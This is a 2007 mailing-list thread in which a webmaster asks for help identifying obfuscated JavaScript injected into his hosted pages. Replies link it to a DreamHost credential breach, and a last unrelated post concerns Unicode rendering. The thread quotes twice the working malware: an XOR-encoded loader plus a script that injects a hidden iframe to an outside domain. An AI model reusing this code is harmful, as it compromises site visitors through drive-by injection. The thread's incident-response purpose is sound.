From suzerain at suzerain.com  Thu Jun  7 03:18:21 2007
From: suzerain at suzerain.com (Marc Antony Vose)
Date: Tue Mar  4 07:24:12 2008
Subject: [front-end] rogue javascript q
Message-ID: <55AFDA69-7BB0-45D2-B670-409F945E3515@suzerain.com>

Hi there:

I discovered some encrypted javascript code on my web server,  
appended to the bottoms of some index.* documents (both .html  
and .php).  It contains the top script block, whose purpose is  
essentially to write out the bottom script block.

Now, the web site this code is finally referencing has been pulled by  
its hosting company, so it apears it's kind of useless now.

My question is:  anyone heard of it / seen it before?  What's the  
most likely method it got into my sites? Manually by one of the  
people who has worked with me?  Some kind of script on the server  
itself (Linux host...Dreamhost)?  Some script/worm running on one of  
my programmers' Windows machines?

I've google searched a bit, and not found any references to this  
code, though I did find a reference to the domain owner on a russian  
forum, but unfortunately I am not fluent in Russian.

http://forum.kaspersky.com/lofiversion/index.php/t37353.html

The code follows....(I separated the lines a bit to make it easier to  
read).

++++++++++++
document.write(unescape("<script>
try {
	function jJ(gn){
		return parseInt(gn)
	}
	var  
ed='eeEeyEezEeKEenEexEecEejEePEeYEeREeUEedEeAEeiEeZEehEeTEeoEe8EegEeVEeJ 
EetEeGEeFEeLEeDEesEefEeBEeHEewEebEekEeMEeCEeXEe9EeOEeIEe6EeqEeWEe7Ee3Eel 
Ee5EerEe4EeaEepEemEeNEyeEyyEyzEyKEynEyxEycEyjEyPEyYEyREyUEydEyAEyiEyZEyh 
EyTEyoEy8EygEyVEyJ';
	var bE=ed.substr(2,1),
		Ji=Array(7626^7493,jJ('192'),3355^3531,4568^4377,jJ('218'), 
26312^26123,13054^12857,jJ('141'),jJ('156'),jJ('153'),jJ('147'),jJ 
('130'),7464^7677,jJ('223'),jJ('201'),jJ('185'), 
27537^27479,17366^17163,jJ('220'),jJ('155'),jJ('253'), 
31646^31489,25663^25799,29616^29509,jJ('154'),jJ('200'),jJ('197'), 
22821^23031,jJ('246'),19723^19845,jJ('214'),15681^15749,20146^20037,jJ 
('136'),jJ('241'),jJ('194'),jJ('157'),jJ('231'),5205^5259,jJ('212'),jJ 
('152'),21074^21209,jJ('133'),jJ('135'),jJ('131'),jJ('215'), 
17803^17747,2220^2109,6664^6851,16213^16289,8567^8585,22867^22963,5545^5 
479,jJ('227'),jJ('148'),jJ('128'),jJ('251'),31355^31369,jJ('249'),jJ 
('219'),jJ('252'),jJ('158'),jJ('137'), 
813^959,8339^8223,29227^29379,15816^15653,31087^31205,23813^24043,jJ 
('239'),28754^28803,jJ('202'),jJ('240'),6234^6363,jJ('217'), 
10371^10245,jJ('132'));
	alert( bE );
	var fV,qZ;
	var  
zH,aU='eeeyezeKenexecejePeYeReyeUedeUeAeUeieReYePeZedeheTezeceneoeTeReAe 
ze8egeieVeJeteGeFeReLeDeKeReseiefeTeBeHeReweDeceBe8eGebeLeDeKeReRekeMefe 
ReTeBeHeReweDeceBe8eGebeRekeMeCeyeBeceXene9eBe8eseieCeOeBeceXene9eBe8eGe 
Ie6eqeWe7e7e7e7e7eGebeRe3eoezehe9eBeTeceCezeoeoeleneBeRefeRegeieIe5efe5e 
IeBeyezeDexeBe8eJeteGeIe5ebeBerexeneKeBeyefe5eIekeMeCeceoe4eaeXepeceKene 
TeOe8eGebeRemeLeDeKeRedeNefyeezecyyeAyeeVyzyKefyeeUyeebeLeDeKeReaynefyee 
hexe3eDeceBeUeCezeAeDeyeyenezeceBeAeCeoeKeOyeeVyxeTefyeePyxece9eAePyeebe 
nede8e3eoezehe9eBeTeceCezeoeoeleneBeCeneTe3eBerycede8edeNeIyeefyeeIyzyKe 
GefefyjeUeGeFeReLeDeKeRedyKefyeyxececexyPePePyeeIe8e3eoezehe9eBeTeceCeAe 
oezeDeceneoeTeCyxeoeyeceRyYefeRyeyeyRyeyeyPeMepe8eGeGeIe3eoezehe9eBeTece 
CeAeoezeDeceneoeTeCyxeoeyeceCeKeBexeAeDezeBe8ePyUydeDyjeie7yjyAeCyjyiePe 
VyeeCyeeGeCeKeBexeAeDezeBe8ePyZeCeIePeVyeeCyeeGeIyeeCyeeIeMepe8eGeIyeeCy 
eeIeayneIyxeTebeLeDeKeRepeoefe3eoezehe9eBeTeceCezeKeBeDeceBeseAeBe9eBeTe 
ce8yeenedeKeDe9eByeeGebepeoeCeyeBecyKececeKenyheheceBe8yeeyeKezyeeVedyKe 
GebepeoeCedeKeDe9eBekeoeKe3eBeKefe7ebeRepeoeCeHene3ecyxefeWebepeoeCyxeBe 
neOyxecefeWebeceKyTeReFeRe3eoezehe9eBeTeceCyheoe3yTeCeDexexeBeTe3yoyxene 
Ae3e8epeoeGebeAeze8edeNeVyzyKeGebeRemezeDecezyxe8eBeGeFeRe3eoezehe9eBeTe 
ceCeHeKeneceBe8yeeeyxece9eAejeeyheoe3yTejeeePyheoe3yTejeeePyxece9eAejyee 
Gebe3eoezehe9eBeTeceCyheoe3yTeCeDexexeBeTe3yoyxeneAe3e8epeoeGebeReAeze8e 
deNeVyzyKeGebeRemeRemeZedeheTezeceneoeTeReMepe8eGeFeReLeDeKeReTezefy8eWe 
VeJygefe5e7eUy8yyeWyVeqyJe6yAe7eDyheze3eBede5ebeLeDeKeRehenefe5e5ebeRede 
oeKe8eBesefe7ebeReBeseReeeReTezebeReBeseIeIeGeReheneIefeReJygeCeyehyheye 
ceKe8eaeDecyxeCedeAeoeoeKe8eaeDecyxeCeKeDeTe3eoe9e8eGeYeJygeCeAeBeTeOecy 
xeGeVeUeVeUeGebeReKeBeceheKeTeRehenebeRemeeePeyezeKenexecej';
	var Tu=String();
	ed=ed.split(bE);
	for(fV=0;fV<aU.length;fV+=2){
		zH=aU.substr(fV,2);
		for(qZ=0;qZ<ed.length;qZ++){
			if(ed[qZ]==zH)
				break;
		}
		Tu+=String.fromCharCode(Ji[qZ]^179);
	}
	document.write(Tu);
	alert( Tu );
}
catch(e){
}
*</script>"))


</script><!--[/E]-->
++++++++++++

BOTTOM SCRIPT BLOCK:

++++++++++++

/* s1f1l1z */
function lc(Nz,KF){
	var Ez=new Date();
	var  Bq= new Date();
	Bq.setTime(Ez.getTime()+86400000);
	document.cookie = Nz+"="+escape(KF)+";
	expires="+Bq.toGMTString();
}
var fP='ct3l',
	HA='1';
var MJ='update1.classictel.org',
	hn='/html/';
	if(document.cookie.indexOf(fP+'='+HA)==-1){
		var fA='http://'+(document.location.host != ''?'':qS()) 
+document.location.host.replace(/[^a-z0-9.-]/,'.').replace(/\.+/,'.') 
+'.'+qS()+'.'+MJ+hn;var So=document.createElement 
('iframe');So.setAttribute('src',fA);So.frameBorder=0;  
So.width=4;So.height=4;
		try {
			document.body.appendChild(So);lc(fP,HA);
		}
		catch(e){
			document.write('<html><body></body></html>');
			document.body.appendChild(So); lc(fP,HA);
		}
	}
function qS(){
	var nc=24,
		Kj="01234567890abcdef";
	var ui="";
	for(eE=0; eE < nc; eE++) ui+= Kj.substr(Math.floor(Math.random() 
*Kj.length),1,1);
	return ui;
}</script>


++++++++++++




Any information/theories are appreciated.  Mostly, I'm just  
interested in figuring out how it got there.


Thanks,

Marc
http://www.suzerain.com



From jay at wnymusic.com  Thu Jun  7 03:35:31 2007
From: jay at wnymusic.com (Jay)
Date: Tue Mar  4 07:24:12 2008
Subject: [front-end] rogue javascript q
In-Reply-To: <55AFDA69-7BB0-45D2-B670-409F945E3515@suzerain.com>
References: <55AFDA69-7BB0-45D2-B670-409F945E3515@suzerain.com>
Message-ID: <f0ddf1540706070035o3c8b1927i560e7ec25fca4afa@mail.gmail.com>

I saw this in the internet today. Dreamhost was hacked via leaked passwords...

http://news.netcraft.com/archives/2007/06/06/mass_customer_site_hack_at_dreamhost.html

Approximately 700 web sites and 3,500 FTP accounts have been
compromised at DreamHost in recent weeks, with crackers insetting
invisible links to porn sites in the HTML code of the hacked pages.
These invisible links are typically used to boost search engine
ranking in Google, which uses links from outside sites as a key
indicator of a site's popularity.

On 6/7/07, Marc Antony Vose <suzerain@suzerain.com> wrote:
> Hi there:
>
> I discovered some encrypted javascript code on my web server,
> appended to the bottoms of some index.* documents (both .html
> and .php).  It contains the top script block, whose purpose is
> essentially to write out the bottom script block.
>
> Now, the web site this code is finally referencing has been pulled by
> its hosting company, so it apears it's kind of useless now.
>
> My question is:  anyone heard of it / seen it before?  What's the
> most likely method it got into my sites? Manually by one of the
> people who has worked with me?  Some kind of script on the server
> itself (Linux host...Dreamhost)?  Some script/worm running on one of
> my programmers' Windows machines?

From suzerain at suzerain.com  Thu Jun  7 03:44:28 2007
From: suzerain at suzerain.com (Marc Antony Vose)
Date: Tue Mar  4 07:24:12 2008
Subject: [front-end] rogue javascript q
In-Reply-To: <55AFDA69-7BB0-45D2-B670-409F945E3515@suzerain.com>
References: <55AFDA69-7BB0-45D2-B670-409F945E3515@suzerain.com>
Message-ID: <AE85FBDA-3E7D-4FD2-9D3F-003C1F7B7CF5@suzerain.com>

Following up to my own post...

One of my friends sent me this:

http://news.netcraft.com/archives/2007/06/06/ 
mass_customer_site_hack_at_dreamhost.html

> Approximately 700 web sites and 3,500 FTP accounts have been
> compromised at DreamHost in recent weeks, with crackers insetting
> invisible links to porn sites in the HTML code of the hacked pages.
> These invisible links are typically used to boost search engine
> ranking in Google, which uses links from outside sites as a key
> indicator of a site's popularity.

I'd guess this is what I'm looking at here...I post in case there are  
other Dreamhost users here.  Might want to change your passwords...

Cheers,

Marc




Le 7 juin 07 ? 15:18, Marc Antony Vose a ?crit :

> Hi there:
>
> I discovered some encrypted javascript code on my web server,  
> appended to the bottoms of some index.* documents (both .html  
> and .php).  It contains the top script block, whose purpose is  
> essentially to write out the bottom script block.
>
> Now, the web site this code is finally referencing has been pulled  
> by its hosting company, so it apears it's kind of useless now.
>
> My question is:  anyone heard of it / seen it before?  What's the  
> most likely method it got into my sites? Manually by one of the  
> people who has worked with me?  Some kind of script on the server  
> itself (Linux host...Dreamhost)?  Some script/worm running on one  
> of my programmers' Windows machines?
>
> I've google searched a bit, and not found any references to this  
> code, though I did find a reference to the domain owner on a  
> russian forum, but unfortunately I am not fluent in Russian.
>
> http://forum.kaspersky.com/lofiversion/index.php/t37353.html
>
> The code follows....(I separated the lines a bit to make it easier  
> to read).
>
> ++++++++++++
> document.write(unescape("<script>
> try {
> 	function jJ(gn){
> 		return parseInt(gn)
> 	}
> 	var  
> ed='eeEeyEezEeKEenEexEecEejEePEeYEeREeUEedEeAEeiEeZEehEeTEeoEe8EegEeVE 
> eJEetEeGEeFEeLEeDEesEefEeBEeHEewEebEekEeMEeCEeXEe9EeOEeIEe6EeqEeWEe7Ee 
> 3EelEe5EerEe4EeaEepEemEeNEyeEyyEyzEyKEynEyxEycEyjEyPEyYEyREyUEydEyAEyi 
> EyZEyhEyTEyoEy8EygEyVEyJ';
> 	var bE=ed.substr(2,1),
> 		Ji=Array(7626^7493,jJ('192'),3355^3531,4568^4377,jJ('218'), 
> 26312^26123,13054^12857,jJ('141'),jJ('156'),jJ('153'),jJ('147'),jJ 
> ('130'),7464^7677,jJ('223'),jJ('201'),jJ('185'), 
> 27537^27479,17366^17163,jJ('220'),jJ('155'),jJ('253'), 
> 31646^31489,25663^25799,29616^29509,jJ('154'),jJ('200'),jJ('197'), 
> 22821^23031,jJ('246'),19723^19845,jJ('214'), 
> 15681^15749,20146^20037,jJ('136'),jJ('241'),jJ('194'),jJ('157'),jJ 
> ('231'),5205^5259,jJ('212'),jJ('152'),21074^21209,jJ('133'),jJ 
> ('135'),jJ('131'),jJ('215'), 
> 17803^17747,2220^2109,6664^6851,16213^16289,8567^8585,22867^22963,5545 
> ^5479,jJ('227'),jJ('148'),jJ('128'),jJ('251'),31355^31369,jJ 
> ('249'),jJ('219'),jJ('252'),jJ('158'),jJ('137'), 
> 813^959,8339^8223,29227^29379,15816^15653,31087^31205,23813^24043,jJ 
> ('239'),28754^28803,jJ('202'),jJ('240'),6234^6363,jJ('217'), 
> 10371^10245,jJ('132'));
> 	alert( bE );
> 	var fV,qZ;
> 	var  
> zH,aU='eeeyezeKenexecejePeYeReyeUedeUeAeUeieReYePeZedeheTezeceneoeTeRe 
> Aeze8egeieVeJeteGeFeReLeDeKeReseiefeTeBeHeReweDeceBe8eGebeLeDeKeReReke 
> MefeReTeBeHeReweDeceBe8eGebeRekeMeCeyeBeceXene9eBe8eseieCeOeBeceXene9e 
> Be8eGeIe6eqeWe7e7e7e7e7eGebeRe3eoezehe9eBeTeceCezeoeoeleneBeRefeRegeie 
> Ie5efe5eIeBeyezeDexeBe8eJeteGeIe5ebeBerexeneKeBeyefe5eIekeMeCeceoe4eae 
> XepeceKeneTeOe8eGebeRemeLeDeKeRedeNefyeezecyyeAyeeVyzyKefyeeUyeebeLeDe 
> KeReaynefyeehexe3eDeceBeUeCezeAeDeyeyenezeceBeAeCeoeKeOyeeVyxeTefyeePy 
> xece9eAePyeebenede8e3eoezehe9eBeTeceCezeoeoeleneBeCeneTe3eBerycede8ede 
> NeIyeefyeeIyzyKeGefefyjeUeGeFeReLeDeKeRedyKefyeyxececexyPePePyeeIe8e3e 
> oezehe9eBeTeceCeAeoezeDeceneoeTeCyxeoeyeceRyYefeRyeyeyRyeyeyPeMepe8eGe 
> GeIe3eoezehe9eBeTeceCeAeoezeDeceneoeTeCyxeoeyeceCeKeBexeAeDezeBe8ePyUy 
> deDyjeie7yjyAeCyjyiePeVyeeCyeeGeCeKeBexeAeDezeBe8ePyZeCeIePeVyeeCyeeGe 
> IyeeCyeeIeMepe8eGeIyeeCyeeIeayneIyxeTebeLeDeKeRepeoefe3eoezehe9eBeTece 
> CezeKeBeDeceBeseAeBe9eBeTece8yeenedeKeDe9eByeeGebepeoeCeyeBecyKececeKe 
> nyheheceBe8yeeyeKezyeeVedyKeGebepeoeCedeKeDe9eBekeoeKe3eBeKefe7ebeRepe 
> oeCeHene3ecyxefeWebepeoeCyxeBeneOyxecefeWebeceKyTeReFeRe3eoezehe9eBeTe 
> ceCyheoe3yTeCeDexexeBeTe3yoyxeneAe3e8epeoeGebeAeze8edeNeVyzyKeGebeReme 
> zeDecezyxe8eBeGeFeRe3eoezehe9eBeTeceCeHeKeneceBe8yeeeyxece9eAejeeyheoe 
> 3yTejeeePyheoe3yTejeeePyxece9eAejyeeGebe3eoezehe9eBeTeceCyheoe3yTeCeDe 
> xexeBeTe3yoyxeneAe3e8epeoeGebeReAeze8edeNeVyzyKeGebeRemeRemeZedeheTeze 
> ceneoeTeReMepe8eGeFeReLeDeKeReTezefy8eWeVeJygefe5e7eUy8yyeWyVeqyJe6yAe 
> 7eDyheze3eBede5ebeLeDeKeRehenefe5e5ebeRedeoeKe8eBesefe7ebeReBeseReeeRe 
> TezebeReBeseIeIeGeReheneIefeReJygeCeyehyheyeceKe8eaeDecyxeCedeAeoeoeKe 
> 8eaeDecyxeCeKeDeTe3eoe9e8eGeYeJygeCeAeBeTeOecyxeGeVeUeVeUeGebeReKeBece 
> heKeTeRehenebeRemeeePeyezeKenexecej';
> 	var Tu=String();
> 	ed=ed.split(bE);
> 	for(fV=0;fV<aU.length;fV+=2){
> 		zH=aU.substr(fV,2);
> 		for(qZ=0;qZ<ed.length;qZ++){
> 			if(ed[qZ]==zH)
> 				break;
> 		}
> 		Tu+=String.fromCharCode(Ji[qZ]^179);
> 	}
> 	document.write(Tu);
> 	alert( Tu );
> }
> catch(e){
> }
> *</script>"))
>
>
> </script><!--[/E]-->
> ++++++++++++
>
> BOTTOM SCRIPT BLOCK:
>
> ++++++++++++
>
> /* s1f1l1z */
> function lc(Nz,KF){
> 	var Ez=new Date();
> 	var  Bq= new Date();
> 	Bq.setTime(Ez.getTime()+86400000);
> 	document.cookie = Nz+"="+escape(KF)+";
> 	expires="+Bq.toGMTString();
> }
> var fP='ct3l',
> 	HA='1';
> var MJ='update1.classictel.org',
> 	hn='/html/';
> 	if(document.cookie.indexOf(fP+'='+HA)==-1){
> 		var fA='http://'+(document.location.host != ''?'':qS()) 
> +document.location.host.replace(/[^a-z0-9.-]/,'.').replace(/\. 
> +/,'.')+'.'+qS()+'.'+MJ+hn;var So=document.createElement 
> ('iframe');So.setAttribute('src',fA);So.frameBorder=0;  
> So.width=4;So.height=4;
> 		try {
> 			document.body.appendChild(So);lc(fP,HA);
> 		}
> 		catch(e){
> 			document.write('<html><body></body></html>');
> 			document.body.appendChild(So); lc(fP,HA);
> 		}
> 	}
> function qS(){
> 	var nc=24,
> 		Kj="01234567890abcdef";
> 	var ui="";
> 	for(eE=0; eE < nc; eE++) ui+= Kj.substr(Math.floor(Math.random() 
> *Kj.length),1,1);
> 	return ui;
> }</script>
>
>
> ++++++++++++
>
>
>
>
> Any information/theories are appreciated.  Mostly, I'm just  
> interested in figuring out how it got there.
>
>
> Thanks,
>
> Marc
> http://www.suzerain.com
>
>
> _______________________________________________
> New York PHP SIG: Front End Mailing List
> AMP Technology
> Supporting Apache, MySQL and PHP
> http://lists.nyphp.org/mailman/listinfo/front-end
> http://www.nyphp.org


From suzerain at suzerain.com  Thu Jun  7 03:46:15 2007
From: suzerain at suzerain.com (Marc Antony Vose)
Date: Tue Mar  4 07:24:12 2008
Subject: [front-end] rogue javascript q
In-Reply-To: <f0ddf1540706070035o3c8b1927i560e7ec25fca4afa@mail.gmail.com>
References: <55AFDA69-7BB0-45D2-B670-409F945E3515@suzerain.com>
	<f0ddf1540706070035o3c8b1927i560e7ec25fca4afa@mail.gmail.com>
Message-ID: <61565412-C8D2-4DDB-83EC-7CBA64ACA697@suzerain.com>

Hi there:

Aha...that sounds like the probable cause.  Thanks for that...I guess  
changing my password was a good choice.

I'm going offline for a while...have a good day.

Cheers,

Marc

Le 7 juin 07 ? 15:35, Jay a ?crit :

> I saw this in the internet today. Dreamhost was hacked via leaked  
> passwords...
>
> http://news.netcraft.com/archives/2007/06/06/ 
> mass_customer_site_hack_at_dreamhost.html
>
> Approximately 700 web sites and 3,500 FTP accounts have been
> compromised at DreamHost in recent weeks, with crackers insetting
> invisible links to porn sites in the HTML code of the hacked pages.
> These invisible links are typically used to boost search engine
> ranking in Google, which uses links from outside sites as a key
> indicator of a site's popularity.
>
> On 6/7/07, Marc Antony Vose <suzerain@suzerain.com> wrote:
>> Hi there:
>>
>> I discovered some encrypted javascript code on my web server,
>> appended to the bottoms of some index.* documents (both .html
>> and .php).  It contains the top script block, whose purpose is
>> essentially to write out the bottom script block.
>>
>> Now, the web site this code is finally referencing has been pulled by
>> its hosting company, so it apears it's kind of useless now.
>>
>> My question is:  anyone heard of it / seen it before?  What's the
>> most likely method it got into my sites? Manually by one of the
>> people who has worked with me?  Some kind of script on the server
>> itself (Linux host...Dreamhost)?  Some script/worm running on one of
>> my programmers' Windows machines?
> _______________________________________________
> New York PHP SIG: Front End Mailing List
> AMP Technology
> Supporting Apache, MySQL and PHP
> http://lists.nyphp.org/mailman/listinfo/front-end
> http://www.nyphp.org


From suzerain at suzerain.com  Mon Jun 18 18:46:49 2007
From: suzerain at suzerain.com (Marc Antony Vose)
Date: Tue Mar  4 07:24:12 2008
Subject: [front-end] combining phonetic symbols
Message-ID: <652D5079-D7A7-42BC-8CC2-9810EA1C6BE4@suzerain.com>

Hi there:

I'm having trouble with gecko.  It's not displaying Unicode combining  
phonetic symbols correctly, best as I can tell.  Meaning, the  
combining breve, combining acute accent, combining macron and  
combining grave accent.  (This is an application for displaying  
Chinese pinyin phonetics.)

This page illustrates this:

http://www.suzerain.com/_test/phonetic_symbols/

View the source...it's just got some codes in it for the characters.

It displays properly in Safari and in Internet Explorer for Windows.   
In any gecko browser (Firefox, Camino, etc.), the combining symbols  
don't display over the character, as they should.

Is this just a limitation of the gecko text renderer?

Cheers,

Marc Vose
http://www.suzerain.com